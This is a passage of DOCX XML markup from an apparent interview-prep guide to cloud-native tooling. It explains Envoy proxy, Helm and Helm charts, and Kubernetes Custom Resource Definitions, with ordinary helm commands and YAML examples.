        <w:br/>
        <w:t>Envoy acts as a smart traffic router that sits between services and controls all network communication.</w:t>
        <w:br/>
        <w:t>It handles every request going in and out of a service.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Envoy is used</w:t>
        <w:br/>
        <w:t>In modern microservices:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services communicate heavily over the network</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You need retries, routing, security, and observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Doing this inside each application is complex</w:t>
        <w:br/>
        <w:t>Envoy solves this by:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Running as a proxy beside each service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managing all traffic externally from the application</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where Envoy runs</w:t>
        <w:br/>
        <w:t>1. Sidecar proxy (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs alongside each application pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Intercepts all inbound/outbound traffic</w:t>
        <w:br/>
        <w:t>2. Edge proxy (API gateway)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sits at the boundary of the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles external traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow (sidecar model)</w:t>
        <w:br/>
        <w:t>Service A → Envoy Proxy → Envoy Proxy → Service B</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key capabilities of Envoy</w:t>
        <w:br/>
        <w:t>1. Traffic management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing (round robin, least request, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Routing based on headers, paths, or weights</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Canary deployments and traffic splitting</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Resilience features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatic retries</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Timeouts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Circuit breaking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fault injection (for testing failures)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics (latency, error rates, traffic volume)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed tracing (request flow across services)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Access logs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TLS termination</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Mutual TLS (mTLS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service identity validation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Envoy in service mesh</w:t>
        <w:br/>
        <w:t>Envoy is the data plane in service mesh systems:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * In Istio → Envoy handles all traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Control plane (istiod) configures Envoy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Linkerd uses its own proxy, but same concept</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Envoy is powerful</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Written in C++ for high performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Extensible via filters (HTTP/TCP/gRPC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hot reload configuration (no restart needed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works in cloud-native environments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Envoy as:</w:t>
        <w:br/>
        <w:t>A smart traffic controller at every intersection in a city that directs cars, checks safety, records movement, and reroutes traffic during congestion.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Envoy vs traditional proxy</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Envoy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traditional Proxy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Dynamic config</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Observability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Minimal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud-native</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it is used</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio service mesh (primary use case)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * API gateways</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Microservice communication layer</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Centralized traffic control</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fine-grained routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Built-in observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Strong security features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Highly scalable</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Envoy Proxy is a high-performance, cloud-native proxy used in microservices architectures to manage all inbound and outbound service traffic, providing load balancing, routing, security (mTLS), resilience features, and observability, and serving as the primary data plane component in service mesh systems like Istio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q295. What is Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Helm is a package manager for applications running on Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Helm helps you install, configure, and manage Kubernetes applications using reusable packages called Charts.</w:t>
        <w:br/>
        <w:t>Think of it like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * apt for Ubuntu</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * yum for Linux</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * npm for Node.js</w:t>
        <w:br/>
        <w:t>👉 But for Kubernetes apps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Helm is used</w:t>
        <w:br/>
        <w:t>Without Helm:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You write multiple YAML files (Deployment, Service, ConfigMap, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manual configuration is error-prone</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hard to manage versions and upgrades</w:t>
        <w:br/>
        <w:t>With Helm:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Everything is packaged into a single Chart</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easy install, upgrade, rollback, and delete</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key concepts in Helm</w:t>
        <w:br/>
        <w:t>1. Chart</w:t>
        <w:br/>
        <w:t>A Helm package that contains:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes manifests</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Templates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Default configuration values</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Release</w:t>
        <w:br/>
        <w:t>A running instance of a Chart in a cluster</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * My app Chart installed as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * release-1 in dev</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * release-2 in prod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Repository</w:t>
        <w:br/>
        <w:t>A place where Charts are stored and shared (like Docker Hub for images)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Helm works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You define a Helm Chart</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. You install it using Helm CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Helm renders Kubernetes YAML templates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Kubernetes API server deploys resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example workflow</w:t>
        <w:br/>
        <w:t>Install an app</w:t>
        <w:br/>
        <w:t>helm install my-app my-chart/</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Upgrade an app</w:t>
        <w:br/>
        <w:t>helm upgrade my-app my-chart/</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rollback an app</w:t>
        <w:br/>
        <w:t>helm rollback my-app 1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Helm chart structure</w:t>
        <w:br/>
        <w:t>my-chart/</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Chart.yaml        # metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── values.yaml       # default configs</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── templates/        # Kubernetes YAML templates</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use case</w:t>
        <w:br/>
        <w:t>Instead of writing:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deployment YAML</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Service YAML</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * ConfigMap YAML</w:t>
        <w:br/>
        <w:t>👉 You use one Helm Chart and just change values.yaml.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Helm is powerful</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reusability (same chart for dev/prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Version control of deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easy upgrades and rollbacks</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Simplifies complex Kubernetes apps</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Helm vs raw Kubernetes YAML</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Helm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Raw YAML</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Reusability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Upgrades</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rollback</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes like cooking:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * YAML files = individual raw recipes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Helm = ready-made cookbook with customizable ingredients</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Simplifies deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manages application lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Supports templating and customization</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enables DevOps automation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Helm is a package manager for Kubernetes that allows users to define, install, upgrade, and manage applications using reusable charts, enabling simplified deployment, version control, and lifecycle management of complex Kubernetes applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q296. Explain Helm charts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Helm Chart is a packaged collection of Kubernetes resources that defines, configures, and deploys an application in Kubernetes using Helm.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A Helm Chart is a reusable blueprint for deploying an application on Kubernetes.</w:t>
        <w:br/>
        <w:t>It bundles all Kubernetes manifests into a single, configurable package.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Helm Charts are used</w:t>
        <w:br/>
        <w:t>Without Helm Charts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You manage multiple YAML files manually</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Configurations are repeated across environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deployments are harder to maintain</w:t>
        <w:br/>
        <w:t>With Helm Charts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Everything is packaged in one structure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You can reuse, version, and customize deployments easily</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What a Helm Chart contains</w:t>
        <w:br/>
        <w:t>A typical chart has:</w:t>
        <w:br/>
        <w:t>1. Chart.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Metadata about the chart</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Name, version, description</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. values.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Default configuration values</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Used to customize deployments without changing templates</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. templates/</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes YAML templates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deployment, Service, ConfigMap, etc.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. charts/</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Dependencies (other charts)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Helm Chart structure</w:t>
        <w:br/>
        <w:t>my-app-chart/</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Chart.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── values.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── templates/</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │    ├── deployment.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │    ├── service.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │    ├── configmap.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └── charts/</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Helm Charts work</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You install a chart using Helm CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Helm reads values.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. It replaces placeholders in templates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Generates final Kubernetes YAML</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. Sends it to Kubernetes API server for deployment</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: values.yaml</w:t>
        <w:br/>
        <w:t>replicaCount: 2</w:t>
        <w:br/>
        <w:t>image:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  repository: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tag: latest</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: template (Deployment)</w:t>
        <w:br/>
        <w:t>apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: {{ .Release.Name }}-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: {{ .Values.replicaCount }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">        image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key concepts</w:t>
        <w:br/>
        <w:t>1. Chart</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * A package of Kubernetes resources</w:t>
        <w:br/>
        <w:t>2. Release</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * A deployed instance of a chart</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * my-app-dev</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * my-app-prod</w:t>
        <w:br/>
        <w:t>3. Values</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Customizable parameters for different environments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Helm Chart lifecycle</w:t>
        <w:br/>
        <w:t>Install</w:t>
        <w:br/>
        <w:t>helm install my-app ./my-chart</w:t>
        <w:br/>
        <w:t>Upgrade</w:t>
        <w:br/>
        <w:t>helm upgrade my-app ./my-chart</w:t>
        <w:br/>
        <w:t>Rollback</w:t>
        <w:br/>
        <w:t>helm rollback my-app 1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Helm Charts vs raw YAML</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Helm Chart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Raw YAML</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Reusability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Configuration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Dynamic (values.yaml)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Static</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Versioning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Easy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes YAML = individual recipe sheets</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Helm Chart = complete cookbook with ingredients you can adjust</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reusable deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Environment-specific configurations (dev/staging/prod)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easier upgrades and rollbacks</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Standardized application packaging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deploying databases (MySQL, PostgreSQL)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Installing monitoring tools (Prometheus, Grafana)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Microservices deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CI/CD-based application delivery</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Helm Chart is a structured package of Kubernetes manifests that uses templating and configurable values to define, install, and manage applications in Kubernetes, enabling reusable, versioned, and easily deployable infrastructure-as-code packages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q297. What are CRDs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CRDs (Custom Resource Definitions) in Kubernetes are a way to extend Kubernetes by creating your own custom resource types beyond the built-in ones like Pods, Services, and Deployments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A CRD lets you define new APIs in Kubernetes as if they were native objects.</w:t>
        <w:br/>
        <w:t>In simple terms:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes already has resources like Pod, Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * With CRD, you can create your own like Database, Backup, KafkaCluster, etc.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why CRDs are used</w:t>
        <w:br/>
        <w:t>They help you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Extend Kubernetes functionality</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Model real-world applications as Kubernetes objects</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Build platform-level abstractions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enable Operators (automation controllers)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How CRDs work</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You define a CustomResourceDefinition</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Kubernetes registers a new API type</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. You create custom resources of that type</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. A controller/operator manages them</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example CRD definition</w:t>
        <w:br/>
        <w:t>apiVersion: apiextensions.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: CustomResourceDefinition</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: databases.mycompany.com</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group: mycompany.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">  names:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kind: Database</w:t>
        <w:br/>
        <w:t xml:space="preserve">    plural: databases</w:t>
        <w:br/>
        <w:t xml:space="preserve">  scope: Namespaced</w:t>
        <w:br/>
        <w:t xml:space="preserve">  versions:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    served: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    storage: true</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>After CRD creation</w:t>
        <w:br/>
        <w:t>You can now create custom resources like:</w:t>
        <w:br/>
        <w:t>apiVersion: mycompany.com/v1</w:t>
        <w:br/>
        <w:t>kind: Database</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-db</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  engine: postgres</w:t>
        <w:br/>
        <w:t xml:space="preserve">  version: "15"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  size: 10Gi</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components</w:t>
        <w:br/>
        <w:t>1. CRD (Definition)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Defines the new resource type</w:t>
        <w:br/>
        <w:t>2. Custom Resource (CR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Actual instance of that type</w:t>
        <w:br/>
        <w:t>3. Controller / Operator</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Watches CRs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Performs actions (create DB, scale app, etc.)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CRD vs Built-in resources</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in (Pod, Service)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CRD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Defined by</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes core</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User/Developer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Extensibility</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fixed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fully customizable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>General workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Domain-specific apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes like a smartphone:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Built-in apps = Phone, Messages, Camera</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CRDs = Apps you install (WhatsApp, Uber, Banking apps)</w:t>
        <w:br/>
        <w:t>You are adding new capabilities to the system.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
